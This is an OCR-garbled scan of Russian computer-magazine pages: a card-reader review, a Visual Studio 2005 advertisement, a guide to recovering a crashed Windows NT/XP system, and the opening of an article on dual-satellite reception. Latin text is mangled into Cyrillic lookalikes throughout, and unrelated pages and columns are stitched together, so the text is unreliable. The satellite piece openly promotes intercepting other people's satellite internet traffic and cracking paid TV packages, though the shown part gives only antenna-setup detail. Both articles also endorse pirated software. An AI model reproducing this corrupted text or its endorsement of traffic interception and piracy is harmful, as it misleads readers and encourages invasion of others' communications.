Місго Эгіѵе, Зтагі Месііа, Зесиге Оідііаі, РЗ ММС (требуется адаптер), 
ММС, Ні Зрееб ММС, Міпі ЗЭ (требуется адаптер), ЗМ, ЗМ Ват СагсІ, 
МетогуЗііск, МЗРго, МЗОио, МЗРгоОио, М3 МадісОаіе.ХО, МЗЗеІесі 
Рипсііоп СагсІ, Ні Зрееб М3, М3 Шга II. 

Интерфейс с компьютером: СІЗВ 2.0 
Отделочные материалы: кожа, хромированная сталь 
Г авариты: 50x90x22 мм 
Вес: 1 15 г 




1 )Яркий дизайн с кожаной отделкой и хромированной сталью. Г аджет 
внешним видом напоминает визитницу. 

2) Благодаря ІІЗВ 2.0 даже большие флешки будут сливаться на комп 
довольно быстро. Но для совместимости с некрокомпами поддержи- 
вается и тормозной ІІЗВ 1.1. 

3) Устройство способно работать с картами 21 формата. Индикато- 
ром чтения/записи служит синий светодиод. 

4) При извлечении флеш-карт нет необходимости совершать безо- 
пасное отключение устройства. 

5) Малый вес и габариты позволяют использовать девайс не только 
дома, но и в пути при помощи ноутбука. 



4)ТИегтаІіаке Тоидбро\А/ег700ѴѴ обладает активной коррекцией мощ- 6) Длины кабеля достаточно для удобного размещения ридера, даже 
ности. С помощью устройства РоѵѵегСНеск 2.0 от Роптюга мы смогли если системный блок установлен под столом, 
оценить КПД девайса — 82%. 





5) Девайс рассчитан на работу не со скромненькими конфигурация- 
ми, ас настоящими кибермонстрами игровой индустрии. Для питания 
сверхпроизводительных видеокарт уже имеются два 6-контактных 
разъема, так что работа в ЗІ_І и СгоззРіге не составляет проблемы. 



Отличное получилось устройство, да вот цена подкачала. Будем 
ать, пока подешевеет. Или, может, сейчас немного разориться? 



7) Комплект поставки включает в себя диск с драйверами и инструк- 
цию на русском языке. 



1 ) На корпусе отсутствует маркировка форматов карт рядом с разъ- 
емами — приходится наугад искать необходимый. 

2 На хромированной отделке остаются следы пальцев. 



.ІаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям БЮРОКРАТ (т.(495) 745-551 1 , ѵѵѵѵѵѵ.Ьиго.ги) , ЫЕООРІѴЕ 
Игалакс (т.(495) 488-2474, ѵѵѵѵѵѵ. і да і ах.ги) , ІРІіпк ( (495) 755-5122, ѵѵѵѵѵѵ. і гі і пк.ги ), а также европейскому представительству компании ТГіегтаІІаке. 




Уоиг роіепііаі. Оиг ра55Іоп.™ 



МісгозоП 





Новый ѴізиаІ Біисііо 2005. Разница очевидна. 

Видите отличия? Как только вы начнете программировать, они сразу 
обнаружатся. Новый ѴізиаІ Біисііо® 2005 имеет 400 новых возможностей, 
дополнительные элементы управления для ѴѴеЬ и ѴѴіпсІоѵѵз®, заготовки кода, 
которые облегчают решение трудоемких задач и избавляют от рутины. 

Таким образом, вы можете сосредоточиться на создании вашей программы. 
Найдите 1 0 отличий и сыграйте в игру на т 5 сІп.тісго 50 Й.сот/ѵ 5 ІисІіо/сІі^егепсе 




ѴізиаІ Зіис1іо2оо5 



© 2005 МісгобоЦ СогрогаГіоп. Все права защищены. Владельцем товарных знаков МісгобоТі;, ѴізиаІ Зіисііо 2005, ѴѴІпсіоѵѵб и "Уоиг роѣепТіаІ. Оиг раББІоп.”, 
зарегистрированных на территории США и /или других стран, и владельцем авторских прав на их дизайн является корпорация МісгобоЛ:. 






;рис касперски ака мыщъ: 



Подъем 
рухнувшей ЫТ 



ШШППШСМТ 

МіГРПКПВТ 



ПОЛНОЕ РУКОВОДСТВО ПО ВОССТАНОВЛЕНИЮ РАБОТОСПОСОБНОСТИ СИСТЕМЫ! 

НЕ ГРУЗИТСЯ СИСТЕМА?! ЭТО ЕЩЕ НЕ ПРИГОВОР. РВАТЬ ВОЛОСЫ НА ГОЛОВЕ И С ГРОМКИМИ ВОЗГЛАСАМИ «ВПЕРЕД! ^ 
БРАТЬСЯ ЗА ПЕРЕУСТАНОВКУ ПОКА РАНО! ОПЕРАЦИОННЫЕ СИСТЕМЫ СЕМЕЙСТВА ЫТ ОЧЕНЬ НАДЕЖНЫ И «САМИ ПО Н 
СЕБЕ» ПАДАЮТ КРАЙНЕ РЕДКО. ОБЫЧНО СИСТЕМУ РОНЯЮТ КРИВЫЕ ПРОГРАММЫ, ВИРУСЫ И НЕПРОДУМАННЫЕ ДЕЙС^ 
ТВИЯ ПОЛЬЗОВАТЕЛЯ. НО ДАЖЕ В СЛУЧАЕ ПАДЕНИЯ ВЕРОЯТНОСТЬ ВОССТАНОВЛЕНИЯ РАБОТОСПОСОБНОСТИ ДОВОЛЬ- 
НО ВЕЛИКА. КАК ПОДНЯТЬ УПАВШУЮ І\ІТ И ВЕРНУТЬ ВСЕ СВОИ ДАННЫЕ? БЕЗ ПАНИКИ! СЕЙЧАС МЫ РАССМОТРИМ САМЫЕ 
РАЗ Н 00 Б РАЗ Н Ы Е О ИТУАЦИ И 




ля специалиста слова «ІЧТ/ѴѴ2К/ 
ХР не грузится» ровным счетом 
ничего не значат . Мог сломаться 
жесткий диск, пострадать файловая система, 
разрушиться таблица разделов, слететь пер- 
вичный/вторичный загрузчик, навернуться 
реестр, исчезнуть файл пЛсіг, ЬооГіпі, заглю- 
чить драйвер и т.д. 

Прежде чем начать действовать, необходи- 
мо произвести первичную диагностику про- 
блемы, тщательно обдумывая каждое свое 
действие. Один неверный шаг может загубить 
гигабайты данных, значительно усложняя 
восстановление или даже делая его практи- 
чески невозможным. 

В идеале, конечно, следовало бы обратиться в 
ближайший сервисный центр и воздержаться 
от «самолечения», однако количество хоро- 
ших сервисов можно пересчитать по пальцам 
одной руки, да и те завалены заказами и рабо- 
тают в основном на заграницу. Остальные же, 
прикрываясь разнообразными лицензиями и 
сертификатами, не имеют никаких собствен- 
ных наработок и используют утилиты массо- 
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вого назначения, которые пользователь мо- 
жет запустить и без них. Тем не менее, даже 
у плохого сотрудника сервисного центра есть 
опыт, которого у рядового пользователя нет. 
С другой стороны, многие виды разрушений 
восстанавливаются элементарно, даже без 
обращения к специалистам. 

О Шаг 1 : диагностика 
жесткого диска 

Первым делом необходимо проверить сам 
жесткий диск: жив ли он или уже нет? Обес- 
точив компьютер и выдернув РАТА/ЗАТА-шлейф, 
подаем питание и слушаем. Нормально ра- 
ботающий диск раскручивает мотор, издает 
характерный звук рекалибровки, после чего 
успокаивается. Любое другое поведение 
указывает на неисправность, которая может 
носить аппаратный (сгорела электроника), 
механический (навернулась механика), фи- 
зический («посыпалось» магнитное покрытие 
пластин) и логический (нарушилась целост- 
ность управляющей микро-ОС) характер. За 
исключением физической порчи блинов все 



остальные повреждения поддаются восста- 
новлению в сервисном центре, оснащенном 
специальным оборудованием. В домашнихже 
условиях, без опыта и знаний «лечение» винта 
гробит его окончательно. 

Если тест диска прошел успешно — подклю- 
чаем к нему РАТА/ЗАТА-шлейф, включаем 
компьютер и смотрим, определяется ли он в 
ВЮЗ Зеіир или нет. Виновником может быть 
как сам жесткий диск, так и ЮЕ-контроллер. 
На всякий случай пробуем подключить диск 
к другому каналу, а еще лучше к другому ком- 
пьютеру. Аналогично проверить работоспо- 
собность ЮЕ-контроллера можно с помощью 
заведомо рабочего винта. 

Если жесткий диск здоров — читаем статью 
дальше. Если же нет — отправляем его в сер- 
висный центр. 

О Шаг 2: диагностика 
файловой системы 

Жесткий диск жив, но система не грузится. 
Как так?! Совсем, что ли, не грузится?! Если 
разрушена таблица разделов, или слетел за- 
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женным инструкциям. Некоторые материн- 
ские платы несут на своем борту несколько 
ВАЮ-контроллеров (например, для РАТА- и 
ЗАТА-дисков), и тут главное — не перепутать, 
какой из них выбрать. 

Кстати говоря, коварная (или скорее тупая 
ІМТ) почему-то до сих пор не знает, что су- 
ществует такая вещь, как порядок загрузки 
с носителей, определяемый в ВІОЗ. Уже лет 
десять как все ВІОЗ'ы позволяют грузиться с 
любого из имеющихся жестких дисков, хоть с 
первого, хоть со второго, хоть с ВАЮ'а. А вот 
І\ІТ самостоятельно сканирует шину, опреде- 
ляет порядок подключения устройств и при 
установке на не первый жесткий диск прину- 
дительно модифицирует загрузчик первого, 
записывая туда специальный код, призван- 
ный загружать систему оттуда, где она есть. 
Запись же на винчестер/РАЮ с разрушенной 
файловой системой/таблицей разделов но- 
сит непредсказуемый и зачастую крайне раз- 
рушительный характер. С жесткими дисками 
проблем нет — просто поменял шлейфы мес- 
тами, и все, а вот с РАЮ-массивами... Ведь 
ЫТ вполне может увидеть РАЮ первым! Есть 
выход: отключаем РАЮ, ставим систему на 
новый жесткий диск (не забывая про драйвер 
РАЮ'а!), подключа- 
ем РАЮ и начинаем 
заниматься восста- 
новлением. 

С программными 
РАЮ'ами все прос- 
то и сложно одно- 
временно. Данные 
о конфигурации 
дисковых масси- 
вов, созданных ѴѴіп- 
сіоѵѵз І\ІТ 4.0 или 
более ранними вер- 
сиями, содержатся 
в реестре и при за- 
грузке с другого вин- 
честера оказывают- 
ся недоступными. В 
ѴѴіпсІоѵѵз 2000 и бо- 
лее поздних версиях 



программные РАЮ-массивы создаются на 
базе динамических дисков, хранящих свои 
атрибуты в фиксированных местах диска, и 
потому доступных отовсюду (естественно, 
[\ІТ 4.0 их не увидит, но это не страшно). 
Другой подводный камень: начиная с 

ѴѴіпсІоѵѵз 2000, система поддерживает атри- 
бут шифрования, позволяющий зашифро- 
вывать/расшифровывать файлы на лету без 
явного ввода пароля, то есть совершенно 
прозрачно для пользователя. На самом деле 
пароль (а точнее, ключ шифрования) хранит- 
ся в реестре и генерируется на основе регис- 
трационных данных пользователя случайным 
образом, то есть повторное создание поль- 
зователя с точно таким же именем/паролем 
не позволит расшифровать зашифрованные 
файлы, если только в нашем распоряжении 
нет оригинального реестра, хранящегося в 
файле Ооситеп^-п-Зеиіпд/имя — пользова- 
теля/І\ІТІ)ЗЕРЮАТ. Если он уцелел, то задача 
восстановления зашифрованных файлов 
сводится к перетаскиванию его на новый 
жесткий диск, если же нет... Расшифровать 
файлы можно только тупым перебором, ко- 
торым занимается множество утилит, но ни 
одна не дает гарантии быстрого успеха. 



> В-Зіисііо ищет уцелевшие файловые 
записи со сигнатуре «РІІ_Е*\х00» 
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грузчик, то ВІОЗ должна материться, причем 
на английском языке. Если слетел піібг (І\ІТ 
Іоабег), поврежден реестр и т. д., то система 
так прямо и говорит. В этом случае файловая 
система с вероятностью примерно 90% цела 
— пострадала лишь сама І\ІТ. Однако случает- 
ся так, что никаких надписей на экран не вы- 
дается, и компьютер, успешно пройдя РОЗТ, 
впадает в завис. Причиной может быть как 
дефект в загрузчике/таблице разделов, так и 
в самом компьютере (памяти, процессоре или 
других компонентах). Если есть заведомо ис- 
правный компьютер — подключи винт к нему 
и посмотри, что будет. Ну, «что будет» сказать 
нетрудно: І\ІТ, в отличие от 9х, не рассчитана 
на смену железа и, попав в неродное аппа- 
ратное окружение, скорее всего, прекратит 
загрузку, выбросив ВЗСЮ. Поэтому действо- 
вать нужно совсем не так! 

Подключаем восстанавливаемый винчестер к 
заведомо исправному компьютеру с установ- 
ленной І\ІТ навторой ЮЕ-канал. Загрузившись 
со «здоровой» І\ІТ, смотрим на подопытный 
диск, есть ли там вообще что-нибудь. Если 
таблица разделов цела, то должны появиться 
новыелогические диски. Пробуем их открыть. 
В лучшем случае мы увидим все свои файлы 
такими, какими они были до катастрофы. Или, 
если не все, то хотя бы часть. В большинстве 
случаев страдает диск С:, а остальные разде- 
лы остаются нетронутыми. Копируем все, что 
осталось, а на резервный винчестер пыта- 
емся восстановить то, чего нет. 

Несколько тонких нюансов. При восстанов- 
лении жестких дисков аппаратный РАЮ, ко- 
торый подключен к интегрированному конт- 
роллеру на материнской плате, переставлять 
можно только на компьютер с аналогичным 
контроллером, что не всегда просто сделать. 
Намного легче подключить к этому же ком- 
пьютеру дополнительный жесткий диск на 
свободный канал и установить І\Л7ѴѴ2К/ХР с 
лазерного диска, естественно, не забыв на- 
жать Р6 и воткнуть дискету с РАЮ-драйвером 
(иначе І\ІТ его ни за что не увидит). Изготовить 
такую дискетуможно.загрузившисьсСО, пос- 
тавляемого вместе с платой, и следуя предло- 
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Ж ЯК Ш 


симптом 




диагноз 


лекарство 


жесткий диск не опознается ВІОЗ'ом 




отказ электроники жесткого диска 


- 




при загрузке с дискеты логичес- 
кие диски не видны (команда С: 
дает ошибку) 


повреждена таблица разделов 
или сигнатура 55Н ААН 


восстанови МБР вручную или 
Р-ЗІисІіо 


операционная система не загру- 
жается, ВІОЗ выдает надпись «поп 
зузіет бізк», тіззіпд орегаііоп 
зузіет или что-то 


логические разделы видны и 
исправны (команды С: и сііг С: 
работают) 


слетел Ьооі 
и/или МВБ -згрузчик 


запусти консоль восстановления 
и дай команды РІХВМР и РІХВООТ 


в этом роде 


логические разделы видны, но 
команда сііг С: дает ошибку 


поврежден Ьооі-сектор или МТР 


восстанови Ьооі-сектор вручную 
или резервной копии, восстанови 
МРТ из МРТМігг 




команда сііг С: выполняется 
нормально, сИксІзк не находит 
ошибок 


навернулась сама операционная 
система 


переустанови операционную 
систему, предварительно ско- 
пировав все ценные файлы на 
другой носитель 




команда сііг в одном или несколь- 
ких подкаталогах выводит мусор 
или показывает не все файлы 


повреждена МТР или одна из ее 
дочерних структур 


запусти Эізк Ехріогег и прочитай 
файлы из МРТ напрямую в обход 
индексов 


операционная система начинает 
закружаться, но затем виснет или 
прерывается с сообщением 
об ошибке 


некоторые файлы не читаются, 
при этом винчестер издает рит- 
мичные скребущие звуки 


физические повреждения повер- 
хности диска 


запусти утилиту восстановления 
жесткого диска от его произво- 
дителя 


некоторые файлы содержат в 
себе фрагменты других файлов 


на диске образовались пересе- 
кающиеся кластеры 


запусти сбксізк 




свободное место на диске плано- 
мерно уменьшается без видимых 
причин 


некоторые кластеры оказались 
потерянными 


запусти сИксІзк 



I 



□ Шаг 3: что делать, если нет резер- 
вного винчестера 

Жесткие диски сейчас дешевы как никогда, 
и приобрести винчестер для восстановитель- 
ных целей может каждый. Правда, бывают 
ситуации, когда данные нужно восстановить 
прямо здесь и сейчас, а на часах — полчет- 
вертого ночи, за окном — темень, магазины 
закрыты и... Или, что еще хуже, все ЮЕ-ка- 
налы заняты программным ПАЮ-массивом, 
и новый диск цеплять просто неоткуда. В 
таких случаях нас выручит ѴѴіпсІоѵѵз РЕ, пред- 
ставляющая собой обыкновенный І_іѵе-СЭ, 
хорошо известный пользователям ІІІМІХ. 
Загрузившись с лазерного диска (не забыв 
нажать Р6 для установки ЯАЮ-драйверов, 
если это необходимо), мы увидим содержи- 
мое восстанавливаемого винчестера или то, 
что от него осталось. Правда, в открытую 
продажу ѴѴіпсІоѵѵз РЕ так и не поступила, и 
по официальным каналам достать ее могут 
либо партнеры МісгозоЙ, либо сотрудники 
авторизованных сервисных центров, либо... 
стоп! Про пиратство мы помним, но сделаем 
вид, что ни Осла, ни Митинского радиорынка 
(с кучей других ларьков) просто не существует 
в природе. 

На самом деле собрать ѴѴіпсІоѵѵз РЕ можно 
из обычного дистрибутива ѴѴіпсІоѵѵз 2000 с 
интегрированным ЗР1 (или выше), ХР или 
Зегѵег 2003 при помощи бесплатной утили- 
ты Вагі'з РЕ Виіісіег, которую можно скачать 



с ѵѵѵѵѵѵ.пи2.пи/реЬиіІсІег/ и прожечь получен- 
ный образ на СЭ-В/СЭ-ВѴѴ. Туда же можно 
закинуть и утилиты для восстановления, о ко- 
торых мы поговорим в следующем разделе. 
РЕ Виіісіег — замечательная вещь, не один 
раз выручавшая меня в практически безвы- 
ходных ситуациях. Однако для изготовления 
ѴѴіпсІоѵѵз РЕ необходимо иметь работающий 
компьютер с выходом в сеть, а его-то в случае 
аварии у нас, скорее всего, и нет. Конечно, 
можно изготовить ѴѴіпсІоѵѵз РЕ заранее, но 
среднестатистический, увы, пользователь 
совершенно не заботится о таких мелочах! 
Даже если он и прожжет диск, то наверняка 
его потеряет и в нужный момент не сможет 
быстро найти. 

В крайнем случае можно обойтись и родным 
дистрибутивным диском ѴѴіпсІоѵѵз 2000/ХР, 
запустив консоль восстановления (гесоѵегу 
сопзоіе). Это делается так: притворившись, 
что хотим переустановить систему, мы дожи- 
даемся экрана с надписью: «Чтобы восста- 
новить ѴѴіпсІоѵѵз, нажмите <В>». Жмем <В> и 
появляется другой экран: «Для исправления 
установки ѴѴіпсІоѵѵз через консоль восста- 
новления нажмите <С>; для исправления 
ѴѴіпсІоѵѵз с помощью операции аварийного 
восстановления нажмите <В>». Жмем <С> и 
попадаем в черный экран а-ля МЗ-ЭОЗ. Если 
консоль восстановления обнаружит неуби- 
тую ѴѴіпсІоѵѵз, то она высветит путь к систем- 
ному каталогу и предложит ввести пароль 



администратора. Предложение из разряда 
тех, от которых невозможно отказаться, но, 
даже если мы помним пароль, не факт, что он 
подойдет (ведь реестр мог быть разрушен, 
а пароль — превратиться в мусор). Если же 
никаких следов пребывания ѴѴіпсІоѵѵз не об- 
наружено, то нас сразу выкинут в корневой 
каталог диска С: (если диск С: жив), не требуя 
пароля. 

Находясь в консоли восстановления, мы мо- 
жем просматривать файлы командой «сііг» и 
совершать некоторые восстановительные 
операции встроенными командами, однако 
запускать свои собственные программы, увы, 
невозможно, равно как и скопировать уцелев- 
шие файлы. То есть скопировать их, конечно, 
можно, но только куда? На дискету?! Да и к 
тому же по умолчанию нам доступен только 
системный каталог (или корневой каталог 
диска С: , если система не обнаружена). Пере- 
ход в остальные каталоги (и доступ к файлам) 
строго запрещен. К счастью, защита снима- 
ется парой магических команд: «ЗЕТ АІІоѵѵАІ 
ІРаіІіз = ігие» и «ЗЕТ АІІоѵѵРетоѵаЫеМесІіа = 
ігие», после чего с диском можно делать все 
что угодно. 

О Шаг 4: восстановление файловой 
системы 

Если логические диски уцелели, но файлы на 
них не видны, или вместо каталогов высве- 
чивается какая-то невнятная абракадабра, 
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> Внешний вид утилиты М3 Васкир 

то с некоторой долей риска можно запустить сМксІзк 
из консоли восстановления, ѴѴіпбоѵѵз РЕ или винчес- 
тера со здоровой [\ІТ. Несмотря на свою кажущуюся 
простоту, сИксІзк — это довольно мощный инструмент, 
корректно исправляющий многие виды разрушений, но 
(!) никаких гарантий, что он не ухудшит ситуацию, у нас 
нет. Поэтому лучше оставить его каскадерам и прочим 
экстремалам, а самим воспользоваться средствами 
неразрушающего восстановления — такими, которые 
извлекают все уцелевшие данные, предлагая запихать 
их на резервный носитель (дополнительный жесткий 
диск, например), не внося при этом никаких изменений 
в файловую систему! Другими словами, по окончании 
восстановительных работ файловая система останется 
в том же состоянии, в котором была до того, и, если ре- 
зультат работы утилиты нас не удовлетворит, мы можем 
попробовать другую, третью... пока, наконец, не найдем 
такую, которая решит наши проблемы. 

С одной стороны, это хорошо, с другой — плохо, посколь- 
кудля копирования данных требуется винчестер солидно- 
го объема, не говоря уже про необходимость повторной 
установки системы со всеми приложениями. Поэтому на 
практике обычно действуют так: сначала запускают ути- 
литу неразрушающего восстановления, вытягивая из дис- 
ка наиболее ценные данные, а потом вызывают сбксізк — 
вдруг повезет, и все разрушения исчезнут? 

Таких утилит существует очень много, но лучшими, на 
мой взгляд, являются КІіЕхрІогег от Яипііте ЗоЙѵѵаге ( ѵѵѵѵѵѵ. 
гипйте.огд ) и Я-Зіисііо от Я-ТТ Іпс ( ѵѵѵѵѵѵ. г-Н. сот ). Обе ути- 
литы платные, однако нашего пользователя подобные 
обстоятельства не смущают, тем более что закон не за- 
прещает держать дома Осла. 

КІіЕхрІогег — это редактор диска, поддерживающий І\ІТРЗ 
и ориентированный на ручную работу, однако благодаря 
интуитивно-понятному интерфейсу с ним может справить- 
ся даже ребенок. В отличие от него Я-Зіибіо представляет 
собой автоматизированный инструмент, осваиваемый 
моментально и позволяющий скопировать все уцелевшие 
файлы несколькими щелчками мыши. В ІЧІЕхрІогег'е каж- 
дый файл приходится извлекать отдельно через серию 
операций, что, разумеется, крайне непроизводительно, 
но при некоторых разрушениях файловой системы авто- 
маты вроде Я-ЗІисІіо виснут окончательно и бесповоротно 
или выдают один лишь мусор, в то время как КІІЕхрІогег 
делает только то, что ему прикажут. 

Несколько слов о внутреннем устройстве ІЧТРЗ. Вся ин- 
формация о файлах (и каталогах) дискового тома хра- 



нится в специальном файле, именуемом МЕТ (Мазіег 
^ііе ТаЫе — Главная Файловая Таблица), который по 
умолчанию хранится в начале раздела, резервируя для 
себя 1 0% от общего размера тома, однако при недостат- 
ке места зарезервированное, но еще не занятое про- 
странство, выделяется в «бюджет оЯего пользования», 
и тогда по мере роста МРТ начинает фрагментироваться, 
размещаясь где попало. Это если смотреть снаружи. 
Изнутри МРТ представляет собой массив файловых за- 
писей (РНЕ ЯЕСОЯЭ), описывающих свойства и поря- 
док размещения на диске соответствующих им файлов. 
Большинство файлов описываются одной записью, не- 
которые (особо длинные и фрагментированные) требуют 
от двух и более. 

Каждая файловая запись начинается с сигнатуры «РІІ_Е*\ 
х00», поэтому может быть обнаружена посекторным ска- 
нированием диска, даже когда таблица разделов, загру- 
зочная запись и начало МРТ полностью разрушены. Как 
следствие, КІТРЗ легко выдерживает форматирование и 
прочие издевательства, чего нельзя сказать о РАТ. 

□ Шаг 5: восстановление 
операционной системы 

Только в исключительных случаях падение ЫТ сопро- 
вождается разрушением файловой системы (особенно 
на КІТРЗ-разделах). Обычно файловая система остается 
цела, а І\ІТ гробится из-за разрушения реестра некор- 
ректно работающим программным обеспечением. В 
стародавние времена проблема решалась установкой 
новой І\ІТ «поверх» упавшей, но вот сейчас. . . наложение 
сервис-паков обновляет ядро І\ІТ, делая переустановку 
невозможной. Инсталлятор, ругнувшись на более све- 
жую версию, предложит либо прервать установку, либо 
установить систему с нуля, после чего все программы (и 
сервис-паки) придется переустанавливать заново, что 
отнимаетуйму времени. 

Существует несколько решений этой проблемы. Напри- 
мер, можно приобрести диск с уже интегрированными 
пакетами обновления или воспользоваться утилитами 
для автоматического резервирования. Их можно раз- 
делить на два больших класса: одни (к которым при- 
надлежит знаменитый Кіогіоп Обоз!) резервируют весь 
системный раздел целиком, другие (типа М3 Васкир) 
сохраняют лишь системный реестр и жизненно-важные 
системные файлы, не трогая всего остального. На про- 
тяжении многих лет я пользуюсь штатным М3 Васкир'ом 
и остаюсь им вполне доволен. Просто щелкаем по бук- 
ве диска, выбираем «свойства», «сервис», «выпол- 
нить архивацию». Сам архивный файл для надежности 
лучше всего держать не на винчестере, а хранить на 
СЭ-Я/СЯ-ЯѴѴ, тем более что он имеет небольшой размер 
(порядка -250 Мб). 

□ Заключение 

Пробежавшись по основам восстановления, мы оставили 
за кадром столь обширный и неподъемный материал, кото- 
рого хватило бы не наодну книгу или, по крайней мере, цикл 
моих статей, которые ты найдешь на диске к журналу. НС 







> Список команд в 



консоли восстановления 
можно получить, набрав 
команду НЕІ_Р. Так, 
например, с помощью 
команды РІХВООТ и 
РІХМВВ ты сможешь вос- 
становить загрузочный 
сектор (Ьооі зесіог) и 
главную загрузочную за- 
пись (тазіег Ьооі гесогсі), 
а утилита ВООТСРО по- 
может отредактировать 
меню загрузки в файле 
ВООТ.ІІЧІ. 

> По умолчанию ЫТ нуме- 
рует логические диски 
в следующем порядке. 
Букву С: получает пер- 
вый раздел на первом 
жестком диске. Буква 
Э: достается первому 
разделу второго жест- 
кого диска. Затем идут 
оставшиеся разделы 
первого жесткого диска, 
а за ними — второго. 




> На диске ты найдешь 
все программы, упомя- 
нутые в статье, а также 
другой полезный софт, 
который использует 
Крис. 




> Созданная с помощью 
ВаЛ РЕ ОС отлично 
чувствует себя в ло- 
кальной сети. Это при- 
годится, чтобы скачать 
необходимые файлы с 
сервера, другого ком- 
пьютера из локалки или 
же из интернета. 
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НАСТРОЙКА АНТЕННЫ СРАЗУ НА ДВА СПУТНИКА И СНИФИНГ ЧУЖОГО ТРАФИКА 
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Межпланетные 
рыболовы 



ВЕДЬ ПРАВИЛЬНО ГОВОРЯТ: НЕТ ПРЕДЕЛА СОВЕРШЕНСТВУ. ЕЩЕ НЕДАВНО МЫ КАК ДЕТИ РАДОВАЛИСЬ, НАСТРОИВ СПУТ- 
НИКОВОЕ ТЕЛЕВИДЕНИЕ, АУЖЕ СЕГОДНЯ ПЫТАЕМСЯ ПРИКРУТИТЬ К АНТЕННЕ ЕЩЕ ОДИН КОНВЕРТЕР И ПОДНЯТЬ С ЕГО 
ПОМОЩЬЮ САТ-ИНТЕРНЕТ. БРЕДОВАЯ, НА ПЕРВЫЙ ВЗГЛЯД, ИДЕЯ ОКАЗАЛАСЬ НЕ ТАКОЙ УЖ БРЕДОВОЙ, А СПУТНИКО- 
ВЫЙ ИНТЕРНЕТ — НЕ ТАКИМ ТОРМОЗНЫМ И БЕСПОЛЕЗНЫМ. ОСОБЕННО С УЧЕТОМ НЕСКОНЧАЕМОГО ПОТОКА ВСЕВОЗ- 
МОЖНОГО СТАФФА И ВАРЕЗА, КОТОРЫЙ УДАЛОСЬ ОРГАНИЗОВАТЬ АБСОЛЮТНО БЕСПЛАТНО! 




О Конец беготне! 

публикованный в одном из про- 
шлых номеров мануал по на- 
стройке спутникового ТВ имел 
ошеломляющий успех. Большое количество 
свободных каналов, атакже платных пакетов, 
которые легко можно взломать, лихо прости- 
мулировали читателя по части установки нуж- 
ного комплекта оборудования. Благо настро- 
ить систему ценою всего в $150 оказалось 
совсем несложно — было бы желание. 
Правда, телевизионный спутник НоіВігсІ (13Е) 
хотя и транслирует тысячи каналов и радио, 
однако не имеет такой важной составляю- 
щей, как интернет-провайдеры. А значит, ни 
сат-инет не поюзаешь, ни халявой за чужой 
счет не разживешься. В последнем случае я 
говорю о перехвате чужого трафика — это 
возможно, но о конкретной реализации мы 
поговорим позже. Вообще, конечно, потоки 
с чисто цифровыми данными на Жар-птице 
все же есть, но все они либо приватные, либо 
совсем скудные, и порадоваться там, даже в 
случае успешного перехвата, нечему. Другое 
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дело — спутникЗігіиз. Запущенный еще в 1 997 
году, это один из наиболее популярных оби- 
тателей геостационарной орбиты, и подхо- 
дящих нам провайдеров там полным полно. В 
том числе и отечественных, что играет нам на 
руку. Наши экономные граждане всякую фиг- 
ню качать не будут. И драгоценный трафик 
будут в основном использовать для закачки 
самых вкусных вещей, а они-то нам и нужны. 
Но как быть? Ведь антеннауже настроена на 
телевизионный спутник, и идти настраивать 
ее на Сириус нет никакого желания. Что же 
теперь? Мотаться туда-сюда и по 10 раз на 
день заниматься настройкой? Не вариант. 
Но зато за дополнительные $30 ты сможешь 
купить еще один конвертер, специальное 
крепление, а также хитроумный переклю- 
чатель, которые позволят «смотреть» два 
спутника сразу. Такой прием, когда спутни- 
ковая система состоит из одной антенны и 
нескольких конвертеров, называется муль- 
тифидом и позволяет принимать несколь- 
ко спутников без дополнительной перена- 
стройки. 



О Немного теории 

Глупо приступать к настройке, не имея 
представления о том, как вся система бу- 
дет работать, поэтому на пальцах попробую 
объяснить, что к чему. Спутниковую антенну 
неспроста называют зеркалом или рефлек- 
тором. Дело в том, что электромагнитные 
волны, идущие со спутника, попадают в кон- 
вертер только после того, как отразятся от 
поверхности антенны. Отражения сигнала от 
поверхности антенны подчиняются класси- 
ческим законам оптики и, в частности, само- 
му главному из них: «Угол падения равен углу 
отражения». Твоя антенна сейчас настроена 
так, чтобы в конвертер попадал отраженный 
сигнал со спутника НоіВігсІ (здесь и далее бу- 
дем использовать его в качестве примера). Но 
ведь на зеркало попадают электромагнитные 
волны и от других спутников (расположенных 
рядом по геостационарной орбите), а значит, 
сигналы от этих спутников тоже фокусируют- 
ся, но в других и в каждом случае разных точ- 
ках. Понимаешь? Если в эти точки поставить 
отдельные конверторы, то спутниковая сис- 
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ращаю внимание, что это расстояние между 
центрами облучателей) по обоим осям. Но в 
какую сторону нужно смещать дополнитель- 
ный конвертер? 

Вспоминаем все то же правило: «Угол паде- 
ния равен углу отражения». Из этого вытека- 
ет следующее. Сигнал, идущий от спутника, 
находящегося на геостационарной орбите 
правее (вернее сказать, западнее), сфокуси- 
руется левееотосновной фокусной оси (если 
смотреть со стороны антенны) и, наоборот, 
сигнал, идущий от спутника, находящегося 
левее (восточнее), сфокусируется справа от 
основной фокусной оси. Тоже самое касает- 
ся другой плоскости: для спутника, который 
выше на орбите, конвертер на планке муль- 
тифида будет ниже, и наоборот. Кроме этого, 
для каждого спутника все теми же средства- 
ми вычисляется (и, что еще лучше, наглядно 
отображается) угол поворота конвертера. 
Это тоже очень важно учитывать! 

Несмотря на то, что параметры расположе- 
ния антенны и конвертеров можно с некото- 
рой точностью рассчитать, все эти данные 
следует брать лишь за приблизительные. 
Настройка все равно осуществляется по 
приборам методом перебора до тех пор, пока 
не будет достигнут максимальный сигнал. 
Соответственно за уровнем сигнала нужно 
следить. Это можно сделать либо с помощью 
специального девайса (За* Ріпсіег), либо ре- 
сивера в связке с небольшим телевизором 
(все это добро придется вынести на крышу, 
но меня лично это мало смущает), либо ком- 
пьютера и двух раций (как вариант, радиоте- 
лефоном с Іпіегсот’ом). В последнем случае 
необходимо посадить терпеливого челове- 
ка или, что лучше, использовать программу 
РазіЗаіРіпбег ( ѵѵѵѵѵѵЧазІзаІІіпсІег.сот І. И тот, 



тема антенны сможет одновременно вести 
прием со всех этих спутников без какой-либо 
перенастройки! 

О Что нам нужно? 

Конечно же, дополнительный конвертер. 
Его мы установим на специальное крепле- 
ние, которое, в свою очередь, монтируется 
к креплению штатного облучателя. Мы рас- 
сматриваем самый простой случай, когда 
устанавливается всего два конвертера. 
Получившаяся таким образом конструкция 
внешне сильно напоминает очки, поэтому 
не удивляйся, если я ее так буду называть. 
Стоимость подходящего крепления сильно 
варьируется, но достойный вариант можно 
взять за $10 в любом магазине спутниковых 
товаров (их можно найти на Г орбушке в Мос- 
кве). Еще нам потребуется переключатель 
между конвертерами, который называется 
ЭіЗЕрС (вообще, так называется протокол, 
по которому осуществляется управление 
переключателем, но не в этом суть). Без него 
ничего не выйдет, поскольку именно он будет 
